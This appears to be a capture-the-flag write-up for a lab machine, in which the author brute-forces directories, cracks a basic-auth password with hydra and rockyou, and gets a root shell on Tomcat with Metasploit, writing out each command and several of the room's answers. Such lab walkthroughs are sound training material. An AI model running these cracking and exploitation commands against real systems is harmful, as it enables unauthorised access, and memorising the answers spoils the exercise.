[Task 1] ToysRus
- What directory can you find, that begins with a g?
- Open DirBuster
- input target url and wordlist
- Click Start and wait
2. Whose name can you find from this directory? Bob
3. What directory has basic authentication? Protected
4. What is bob’s password to the protected part of the website?
I used hydra to crack the password with http-get form
hydra -l bob -P /root/Desktop/rockyou.txt -f 10.10.176.108 http-get /protected/
Try to login with credential
5. What other port that serves a webs service is open on the machine?
Find open port
nmap -Pn 10.10.176.108
nmap -sV -T 4 10.10.176.108
Tomcat port is 1234
6. Going to the service running on that port, what is the name and version of the software?
nmap -sV -A -T 4 10.10.176.108
Also access port 1234
7. Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.
How many documentation files did Nikto identify?
Click Manager App
Try with credential
Let’s scan the site
nikto -h http://10.10.131.147:1234/manager/html -id bob:<password>
There’re 5 documents.
10. Where is Ektron CMS version information found?
9. What version of Apache-Coyote is this service using? 1.1
10. Use Metasploit to exploit the service and get a shell on the system.
What user did you get a shell as?
There’re 3 exploits that I can use.
I tried to use #13 and #14, but it didn’t work. I’ll skip to #15.
set HttpPassword <password>
set HttpUsername bob
set RHOSTS <ip>
set RPORT 1234
Let’s get shell
What user did you get a shell as? root
10. What text is in the file /root/flag.txt